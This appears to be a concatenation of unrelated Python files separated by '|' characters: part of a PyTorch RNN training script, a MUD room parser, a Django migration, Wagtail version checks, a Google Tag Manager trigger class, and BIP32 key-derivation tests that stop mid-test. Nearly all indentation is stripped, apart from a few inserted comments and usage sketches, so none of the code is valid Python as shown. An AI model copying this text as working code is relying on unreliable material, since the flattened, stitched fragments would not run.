#count(torch.max(output.view(-1, self.noutput), 1)[1], targets, targets.size()[0], self.results, self.labels)
#loss.backward(retain_variables=True)
loss.backward()
#torch.nn.utils.clip_grad_norm(self.model.parameters(), 1.0 * args.clip / args.batch_size)
self.optimizer.step()
total_loss += loss.data
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss[0] / args.log_interval
elapsed = time.time() - start_time
print('| epoch {:3d} | lr {:02.5f} | wps {:5.2f} | '
'loss {:5.2f}'.format(
epoch, lr,
args.batch_size * args.bptt / (elapsed / args.log_interval), cur_loss))
#self.score()
total_loss = 0
start_time = time.time()
def train(self):
# Loop over epochs.
lr = args.lr
best_val_loss = None
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(1, self.max_epochs+1):
epoch_start_time = time.time()
self.__train(lr, epoch)
val_loss = self.evaluate(self.valid_iter)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s '.format(epoch, (time.time() - epoch_start_time),))
print('-' * 89)
                # Save the model if the validation accuracy (returned by evaluate()) is the best so far.
if not best_val_loss or val_loss > best_val_loss:
with open(args.save, 'wb') as f:
torch.save(self.model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
print("restore the model.")
                    # reload the best checkpoint before continuing with a lower lr
                    self.model = torch.load(args.save)
lr *= args.lr_decay
self.optimizer = optim.Adam(self.model.parameters(), lr = lr)
except KeyboardInterrupt:
print('-' * 89)
print('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb') as f:
self.model = torch.load(f)
if not self.test_iter is None:
self.evaluate(self.valid_iter)
self.evaluate(self.test_iter, 'test')
def evaluate(self, data_source, prefix='valid'):
# Turn on evaluation mode which disables dropout.
self.model.eval()
self.clear_results()
total_loss = 0
        hidden = self.model.init_hidden(data_source.batch_size)
for d, targets in data_source:
output, hidden, loss = self.__forward(d, hidden, targets)
count(torch.max(output.view(-1, self.noutput), 1)[1], targets, targets.size()[0], self.results, self.labels)
total_loss += loss.data
ave_loss = total_loss[0] / len(data_source)
print('| {0} loss {1:5.2f} | {0} '.format(prefix, ave_loss))
acc = self.score()
return acc
if __name__ == '__main__':
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
path = args.data + '/'
eval_batch_size = 10
scaler = None
train_iter = DataIter(
path + 'train.txt',
args.batch_size,
args.bptt,
scaler,
cuda = args.cuda,
)
scaler = train_iter.scaler
valid_iter = DataIter(
path + 'valid.txt',
eval_batch_size,
args.bptt,
scaler,
cuda = args.cuda,
)
test_iter = DataIter(
path + 'test.txt',
eval_batch_size,
args.bptt,
scaler,
cuda = args.cuda,
)
###############################################################################
# Build the model
###############################################################################
model = RNNModel(
nfed = args.nfeatures,
nhid = args.nhid,
noutputs = 3,
nlayers = args.nlayers,
dropout = args.dropout,
)
if args.cuda:
model.cuda()
trainer = Trainer(
model = model,
train_iter = train_iter,
valid_iter = valid_iter,
test_iter = test_iter,
max_epochs = args.epochs
)
trainer.train()
|
# coding: utf-8
import re
from constants import ROOM_DOOR_FLAGS
from constants import ROOM_FLAGS
from constants import ROOM_SECTOR_TYPES
from utils import bitvector_to_flags
from utils import clean_bitvector
from utils import lookup_value_to_dict
EXIT_RE = r"""D(\d+)
(.*?)~
(.*?)~
(.*?)
"""
EXIT_PATTERN = re.compile(EXIT_RE, re.DOTALL | re.MULTILINE)
EXTRA_DESC_RE = r"""E
(.*?)~
(.*?)
~"""
EXTRA_DESC_PATTERN = re.compile(EXTRA_DESC_RE, re.DOTALL)
def parse_exits(text):
exits = []
matches = EXIT_PATTERN.findall(text)
for match in matches:
direction, desc, keys, other = match
desc = desc.rstrip('\n')
flag, key_num, to = other.strip().split()
exit = dict()
exit['dir'] = int(direction)
exit['desc'] = desc
exit['keywords'] = keys.split()
exit['key_number'] = int(key_num)
exit['room_linked'] = int(to)
exit['door_flag'] = {
'value': int(flag),
'note': ROOM_DOOR_FLAGS.get(int(flag), None)
}
exits.append(exit)
return exits
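# Usage sketch (added for illustration; assumes a CircleMUD-style exit block
# and that ROOM_DOOR_FLAGS maps the numeric flag to a descriptive note):
#
#     text = "D0\nA sturdy oak door.\n~\ndoor oak~\n1 -1 3001\n"
#     parse_exits(text)
#     # -> [{'dir': 0, 'desc': 'A sturdy oak door.',
#     #      'keywords': ['door', 'oak'], 'key_number': -1,
#     #      'room_linked': 3001,
#     #      'door_flag': {'value': 1, 'note': ROOM_DOOR_FLAGS.get(1)}}]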
def parse_extra_descs(text):
extra_descs = []
for keywords, desc in EXTRA_DESC_PATTERN.findall(text):
extra_desc = dict(keywords=keywords.split(), desc=desc)
extra_descs.append(extra_desc)
return extra_descs
def parse_room(text):
parts = text.split('~')
vnum, name = parts[0].split('\n')
desc = parts[1].strip()
zone, flags, sector = parts[2].strip() \
.split('\n')[0].strip().split(' ')
d = dict()
d['id'] = int(vnum)
d['name'] = name.strip()
d['desc'] = desc.strip('\n')
d['zone_number'] = int(zone)
flags = clean_bitvector(flags)
d['flags'] = []
if flags:
d['flags'] = bitvector_to_flags(flags, ROOM_FLAGS)
# sector type flag is always an int
d['sector_type'] = lookup_value_to_dict(int(sector), ROOM_SECTOR_TYPES)
bottom_matter = '~'.join(parts[2:])
d['exits'] = parse_exits(bottom_matter)
d['extra_descs'] = parse_extra_descs(bottom_matter)
return d
|
# Generated by Django 2.2.7 on 2021-12-02 14:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ugc', '0014_new'),
]
operations = [
migrations.AddField(
model_name='new',
name='heading_en',
field=models.CharField(blank=True, max_length=500, null=True),
),
migrations.AddField(
model_name='new',
name='text_en',
field=models.TextField(blank=True, null=True),
),
]
|
import re
from wagtail import __version__ as WAGTAIL_VERSION
def is_wagtail_version_more_than_equal_to_2_5():
    expression = r'^((2\.([5-9]{1,}|([1-9]{1,}[0-9]{1,}))(\.\d+)*)|(([3-9]{1,})(\.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
def is_wagtail_version_more_than_equal_to_2_0():
    expression = r'^((2\.([0-9]{1,}|([1-9]{1,}[0-9]{1,}))(\.\d+)*)|(([3-9]{1,})(\.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
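# Usage sketch (added for illustration): both helpers return a truthy
# re.Match object (or None), so they can be used directly in conditionals:
#
#     if is_wagtail_version_more_than_equal_to_2_5():
#         ...  # code paths that rely on Wagtail >= 2.5 APIs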
|
"""trigger.py"""
import gtm_manager.base
import gtm_manager.parameter
from gtm_manager.utils import param_dict
class GTMTrigger(gtm_manager.base.GTMBase):
"""Open a specific GTM Trigger.
Args:
        trigger (dict): An API representation of the GTM Trigger. If provided, the resource will
            not be loaded from the API. :code:`trigger` or :code:`path` argument must be set.
path (str): The API path to the resource, i.e.
"accounts/1234/containers/1234/workspaces/1234/trigger/123". If provided instead of
:code:`trigger`, the representation will be loaded from the API. :code:`path` or
:code:`trigger` argument must be set.
        parent (str): Required when the instance is initialized with a :code:`trigger` argument,
            to explicitly set the parent path, i.e. "accounts/1234/containers/1234/workspaces/1234"
**kwargs: Additional keyword args to initialize the base class.
"""
def __init__(self, trigger=None, path=None, parent=None, **kwargs):
super().__init__(**kwargs)
self.triggers_service = (
self.service.accounts().containers().workspaces().triggers()
) # pylint: disable=E1101
if trigger:
pass
elif path:
trigger = self._get_trigger(path)
else:
raise ValueError("Please pass either a container obj or container path.")
self._maxTimerLengthSeconds = trigger.get("maxTimerLengthSeconds")
self._totalTimeMinMilliseconds = trigger.get("totalTimeMinMilliseconds")
self._uniqueTriggerId = trigger.get("uniqueTriggerId")
self._verticalScrollPercentageList = trigger.get("verticalScrollPercentageList")
self._horizontalScrollPercentageList = trigger.get(
"horizontalScrollPercentageList"
)
self._containerId = trigger.get("containerId")
self._waitForTagsTimeout = trigger.get("waitForTagsTimeout")
self._accountId = trigger.get("accountId")
self._waitForTags = trigger.get("waitForTags")
self._intervalSeconds = trigger.get("intervalSeconds")
self._eventName = trigger.get("eventName")
self._visibilitySelector = trigger.get("visibilitySelector")
self._workspaceId = trigger.get("workspaceId")
self._customEventFilter = trigger.get("customEventFilter")
self._parameter = trigger.get("parameter") or []
self._parentFolderId = trigger.get("parentFolderId")
self._continuousTimeMinMilliseconds = trigger.get(
"continuousTimeMinMilliseconds"
)
self._selector = trigger.get("selector")
self._triggerId = trigger.get("triggerId")
self._tagManagerUrl = trigger.get("tagManagerUrl")
self._fingerprint = trigger.get("fingerprint")
self._visiblePercentageMax = trigger.get("visiblePercentageMax")
self._name = trigger.get("name")
self._visiblePercentageMin = trigger.get("visiblePercentageMin")
self._type = trigger.get("type")
self._notes = trigger.get("notes")
self._interval = trigger.get("interval")
self._filter = trigger.get("filter")
self._autoEventFilter = trigger.get("autoEventFilter")
self._limit = trigger.get("limit")
self._checkValidation = trigger.get("checkValidation")
self._path = path or "{}/triggers/{}".format(parent, self._triggerId)
self._parameter = [
gtm_manager.parameter.GTMParameter(x) for x in self._parameter
]
@property
def maxTimerLengthSeconds(self):
"""obj: Represents a Google Tag Manager Parameter. - Max time to fire Timer Events (in
seconds). Only valid for AMP Timer trigger.
"""
return self._maxTimerLengthSeconds
@property
def totalTimeMinMilliseconds(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger minimum total
visible time (in milliseconds). Only valid for AMP Visibility trigger.
"""
return self._totalTimeMinMilliseconds
@property
def uniqueTriggerId(self):
"""obj: Represents a Google Tag Manager Parameter. - Globally unique id of the trigger that
auto-generates this (a Form Submit, Link Click or Timer listener) if any. Used to make
incompatible auto-events work together with trigger filtering based on trigger ids. This
        value is populated during output generation since the tags implied by triggers don't exist
until then. Only valid for Form Submit, Link Click and Timer triggers.
"""
return self._uniqueTriggerId
@property
def verticalScrollPercentageList(self):
"""obj: Represents a Google Tag Manager Parameter. - List of integer percentage values for
scroll triggers. The trigger will fire when each percentage is reached when the view is
scrolled vertically. Only valid for AMP scroll triggers.
"""
return self._verticalScrollPercentageList
@property
def horizontalScrollPercentageList(self):
"""obj: Represents a Google Tag Manager Parameter. - List of integer percentage values for
scroll triggers. The trigger will fire when each percentage is reached when the view is
scrolled horizontally. Only valid for AMP scroll triggers.
"""
return self._horizontalScrollPercentageList
@property
def containerId(self):
"""str: GTM Container ID.
"""
return self._containerId
@property
def waitForTagsTimeout(self):
"""obj: Represents a Google Tag Manager Parameter. - How long to wait (in milliseconds) for
tags to fire when "waits_for_tags" above evaluates to true. Only valid for Form Submission
and Link Click triggers.
"""
return self._waitForTagsTimeout
@property
def accountId(self):
"""str: GTM Account ID.
"""
return self._accountId
@property
def waitForTags(self):
"""str: Represents a Google Tag Manager Parameter. - Whether or not we should delay the form
submissions or link opening until all of the tags have fired (by preventing the default
action and later simulating the default action). Only valid for Form Submission and Link
Click triggers.
"""
return self._waitForTags
@property
def intervalSeconds(self):
"""obj: Represents a Google Tag Manager Parameter. - Time between Timer Events to fire (in
seconds). Only valid for AMP Timer trigger.
"""
return self._intervalSeconds
@property
def eventName(self):
"""obj: Represents a Google Tag Manager Parameter. - Name of the GTM event that is fired.
Only valid for Timer triggers.
"""
return self._eventName
@property
def visibilitySelector(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger CSS selector (i.e.
"-id"). Only valid for AMP Visibility trigger.
"""
return self._visibilitySelector
@property
def workspaceId(self):
"""str: GTM Workspace ID.
"""
return self._workspaceId
@property
def customEventFilter(self):
"""list: Used in the case of custom event, which is fired iff all Conditions are true.
"""
return self._customEventFilter
@property
def parameter(self):
"""list: Additional parameters.
"""
return self._parameter
@property
def parentFolderId(self):
"""str: Parent folder id.
"""
return self._parentFolderId
@property
def continuousTimeMinMilliseconds(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger minimum continuous
visible time (in milliseconds). Only valid for AMP Visibility trigger.
"""
return self._continuousTimeMinMilliseconds
@property
def selector(self):
"""obj: Represents a Google Tag Manager Parameter. - A click trigger CSS selector (i.e. "a",
"button" etc.). Only valid for AMP Click trigger.
"""
return self._selector
@property
def triggerId(self):
"""str: The Trigger ID uniquely identifies the GTM Trigger.
"""
return self._triggerId
@property
def tagManagerUrl(self):
"""str: Auto generated link to the tag manager UI
"""
return self._tagManagerUrl
@property
def fingerprint(self):
"""str: The fingerprint of the GTM Trigger as computed at storage time. This value is
recomputed whenever the trigger is modified.
"""
return self._fingerprint
@property
def visiblePercentageMax(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger maximum percent
visibility. Only valid for AMP Visibility trigger.
"""
return self._visiblePercentageMax
@property
def path(self):
"""str: GTM Trigger"s API relative path.
"""
return self._path
@property
def name(self):
"""str: Trigger display name.
"""
return self._name
@property
def visiblePercentageMin(self):
"""obj: Represents a Google Tag Manager Parameter. - A visibility trigger minimum percent
visibility. Only valid for AMP Visibility trigger.
"""
return self._visiblePercentageMin
@property
def type(self):
"""str: Defines the data layer event that causes this trigger.
"""
return self._type
@property
def notes(self):
"""str: User notes on how to apply this trigger in the container.
"""
return self._notes
@property
def interval(self):
"""obj: Represents a Google Tag Manager Parameter. - Time between triggering recurring Timer
Events (in milliseconds). Only valid for Timer triggers.
"""
return self._interval
@property
def filter(self):
"""list: The trigger will only fire iff all Conditions are true.
"""
return self._filter
@property
def autoEventFilter(self):
"""list: Used in the case of auto event tracking.
"""
return self._autoEventFilter
@property
def limit(self):
"""obj: Represents a Google Tag Manager Parameter. - Limit of the number of GTM events this
Timer Trigger will fire. If no limit is set, we will continue to fire GTM events until the
user leaves the page. Only valid for Timer triggers.
"""
return self._limit
@property
def checkValidation(self):
"""obj: Represents a Google Tag Manager Parameter. - Whether or not we should only fire tags
if the form submit or link click event is not cancelled by some other event handler (e.g.
because of validation). Only valid for Form Submission and Link Click triggers.
"""
return self._checkValidation
def update(self, refresh=False, parameter=None, **kwargs):
"""Update the current trigger. The GTM API does not support a partial update. Therfore, this
method will send all fields expliztily set in the method arguments and those cached in the
instance properties.
GTMParameters passed in a list as the :code:`parameter` argument, will be merged recursivly
with the exsisting parameters based on their parameter key.
All other API resource properties can be overwritten by specifying the property name as
keyword arguments on the method call.
Args:
refresh (bool): Force a refresh of the entire GTMTrigger instance to prevent implicitly
sending stale property data.
            parameter (list): :class:`gtm_manager.parameter.GTMParameter` list to be merged
                recursively with the existing parameters based on their parameter key.
**kwargs: Additional resource properties to update with this call.
Raises:
ValueError
"""
if refresh:
self.__init__(path=self._path, service=self.service)
default_asset = {
"maxTimerLengthSeconds": self._maxTimerLengthSeconds,
"totalTimeMinMilliseconds": self._totalTimeMinMilliseconds,
"uniqueTriggerId": self._uniqueTriggerId,
"verticalScrollPercentageList": self._verticalScrollPercentageList,
"horizontalScrollPercentageList": self._horizontalScrollPercentageList,
"containerId": self._containerId,
"waitForTagsTimeout": self._waitForTagsTimeout,
"accountId": self._accountId,
"waitForTags": self._waitForTags,
"intervalSeconds": self._intervalSeconds,
"eventName": self._eventName,
"visibilitySelector": self._visibilitySelector,
"workspaceId": self._workspaceId,
"customEventFilter": self._customEventFilter,
"parentFolderId": self._parentFolderId,
"continuousTimeMinMilliseconds": self._continuousTimeMinMilliseconds,
"selector": self._selector,
"triggerId": self._triggerId,
"tagManagerUrl": self._tagManagerUrl,
"fingerprint": self._fingerprint,
"visiblePercentageMax": self._visiblePercentageMax,
"path": self._path,
"name": self._name,
"visiblePercentageMin": self._visiblePercentageMin,
"type": self._type,
"notes": self._notes,
"interval": self._interval,
"filter": self._filter,
"autoEventFilter": self._autoEventFilter,
"limit": self._limit,
"checkValidation": self._checkValidation,
}
update_asset = {**default_asset, **kwargs}
if parameter:
parameter_dict = {**param_dict(self._parameter), **param_dict(parameter)}
parameter = list(parameter_dict.values())
else:
parameter = self._parameter
update_asset["parameter"] = [x.to_obj() for x in parameter]
update_asset = {k: v for k, v in update_asset.items() if v is not None}
request = self.triggers_service.update(path=self.path, body=update_asset)
response = request.execute()
self.__init__(trigger=response, service=self.service)
def _get_trigger(self, path):
"""_get_trigger"""
request = self.triggers_service.get(path=path)
response = request.execute()
return response
def delete(self):
"""Delete the current trigger.
"""
request = self.triggers_service.delete(path=self._path)
request.execute()
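# Usage sketch (added for illustration; assumes an authorized Tag Manager API
# client is passed through to gtm_manager.base.GTMBase as `service`):
#
#     trigger = GTMTrigger(
#         path="accounts/1234/containers/1234/workspaces/1234/triggers/12",
#         service=service,
#     )
#     trigger.update(name="pageview - all pages")  # merges with cached fields
#     trigger.delete()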
|
#!/usr/bin/env python3
# Copyright (C) 2017-2020 The btclib developers
#
# This file is part of btclib. It is subject to the license terms in the
# LICENSE file found in the top-level directory of this distribution.
#
# No part of btclib including this file, may be copied, modified, propagated,
# or distributed except according to the terms contained in the LICENSE file.
import json
import unittest
from os import path
from btclib import bip39, slip32
from btclib.base58 import b58decode, b58encode
from btclib.base58address import p2pkh_from_xpub, p2wpkh_p2sh_from_xpub
from btclib.bech32address import p2wpkh_from_xpub
from btclib.bip32 import (crack_prvkey, derive, deserialize, fingerprint,
rootxprv_from_bip39mnemonic, rootxprv_from_seed,
serialize, xpub_from_xprv)
from btclib.curvemult import mult
from btclib.curves import secp256k1 as ec
from btclib.network import (_PRV_VERSIONS, MAIN_xprv, MAIN_yprv, MAIN_Yprv,
MAIN_zprv, MAIN_Zprv, TEST_tprv, TEST_uprv,
TEST_Uprv, TEST_vprv, TEST_Vprv)
class TestBIP32(unittest.TestCase):
def test_serialize(self):
xprv = b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi"
xprv_dict = deserialize(xprv)
xpr2 = serialize(xprv_dict)
self.assertEqual(xpr2, xprv)
# private key not in [1, n-1]
inv_key = (ec.n).to_bytes(ec.nsize, 'big')
decoded_key = b58decode(xprv, 78)
xkey = b58encode(decoded_key[:46] + inv_key)
self.assertRaises(ValueError, deserialize, xkey)
#deserialize(xkey)
xpub = xpub_from_xprv(xprv)
xpub2 = xpub_from_xprv(deserialize(xprv))
self.assertEqual(xpub, xpub2)
def test_fingerprint(self):
xprv = b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi"
f = fingerprint(xprv)
child_key = derive(xprv, b'\x00\x00\x00\x00')
pf = deserialize(child_key)['parent_fingerprint']
self.assertEqual(f, pf)
xpub = xpub_from_xprv(xprv)
f = fingerprint(xpub)
self.assertEqual(f, pf)
child_key2 = derive(deserialize(xprv), 0)
self.assertEqual(child_key2, child_key)
def test_utils(self):
# root key, zero depth
xprv = b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi"
xdict = deserialize(xprv)
decoded_key = b58decode(xprv, 78)
self.assertEqual(xdict["version"], decoded_key[:4])
self.assertEqual(xdict["depth"], decoded_key[4])
self.assertEqual(xdict["parent_fingerprint"], decoded_key[5:9])
self.assertEqual(xdict["index"], decoded_key[9:13])
self.assertEqual(xdict["chain_code"], decoded_key[13:45])
self.assertEqual(xdict["key"], decoded_key[45:])
# zero depth with non-zero parent_fingerprint
f2 = b'\x01\x01\x01\x01'
invalid_key = b58encode(xprv[:5] + f2 + xprv[9:])
self.assertRaises(ValueError, deserialize, invalid_key)
# deserialize(invalid_key)
# zero depth with non-zero index
i2 = b'\x01\x01\x01\x01'
invalid_key = b58encode(xprv[:9] + i2 + xprv[13:])
self.assertRaises(ValueError, deserialize, invalid_key)
# deserialize(invalid_key)
# non-zero depth (255) with zero parent_fingerprint
d2 = b'ff'
invalid_key = b58encode(xprv[:4] + d2 + xprv[5:])
self.assertRaises(ValueError, deserialize, invalid_key)
# deserialize(invalid_key)
child_key = derive(xprv, 0)
# Derivation path final depth 256>255
self.assertRaises(ValueError, derive, child_key, "." + 255*"/0")
#derive(child_key, "."+255*"/0")
# Empty derivation path
self.assertRaises(ValueError, derive, child_key, "")
#derive(child_key, "")
# Invalid derivation path root: ";"
self.assertRaises(ValueError, derive, child_key, ";/0")
#derive(child_key, ";/0")
# Derivation path depth 256>255
self.assertRaises(ValueError, derive, child_key, "." + 256*"/0")
#derive(child_key, "." + 256*"/0")
# xkey is not a public one
self.assertRaises(ValueError, p2pkh_from_xpub, xprv)
# p2pkh_from_xpub(xprv)
def test_vector1(self):
"""BIP32 test vector 1
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
"""
xkey_version = _PRV_VERSIONS[0]
seed = "000102030405060708090a0b0c0d0e0f"
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
rootxprv = rootxprv_from_seed(seed, xkey_version.hex())
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
rootxpub = xpub_from_xprv(rootxprv) # neutering
self.assertEqual(rootxpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xprv = rootxprv
xpub = rootxpub
xprv = derive(xprv, ".") # private relative
self.assertEqual(xprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
xprv = derive(rootxprv, "m") # private absolute
self.assertEqual(xprv, b"xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi")
xpub = derive(xpub, ".") # public relative
self.assertEqual(xpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xpub = derive(rootxpub, "m") # public absolute
self.assertEqual(xpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8")
xprv = derive(xprv, "./0'") # private relative
self.assertEqual(xprv, b"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7")
xprv = derive(rootxprv, "m/0'") # private absolute
self.assertEqual(xprv, b"xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw")
xprv = derive(xprv, "./1") # private relative
self.assertEqual(xprv, b"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs")
xprv = derive(rootxprv, "m/0'/1") # private absolute
self.assertEqual(xprv, b"xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs")
xpub = derive(xpub, "./1") # public relative
self.assertEqual(xpub, b"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ")
xprv = derive(xprv, "./2H") # private relative
self.assertEqual(xprv, b"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM")
xprv = derive(rootxprv, "m/0'/1/2'") # private absolute
self.assertEqual(xprv, b"xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5")
xprv = derive(xprv, "./2") # private relative
self.assertEqual(xprv, b"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334")
xprv = derive(rootxprv, "m/0'/1/2'/2") # private absolute
self.assertEqual(xprv, b"xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334")
xpub = derive(xpub, "./2") # public relative
self.assertEqual(xpub, b"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV")
xprv = derive(xprv, "./1000000000") # private relative
self.assertEqual(xprv, b"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76")
# private absolute
xprv = derive(rootxprv, "m/0'/1/2'/2/1000000000")
self.assertEqual(xprv, b"xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76")
xpub = derive(xpub, "./1000000000") # public relative
self.assertEqual(xpub, b"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy")
def test_vector2(self):
"""BIP32 test vector 2
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
"""
xkey_version = _PRV_VERSIONS[0]
seed = "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542"
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U")
rootxpub = xpub_from_xprv(rootxprv) # neutering
self.assertEqual(rootxpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xprv = rootxprv
xpub = rootxpub
xprv = derive(xprv, ".") # private relative
self.assertEqual(xprv, b"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U")
xprv = derive(rootxprv, "m") # private absolute
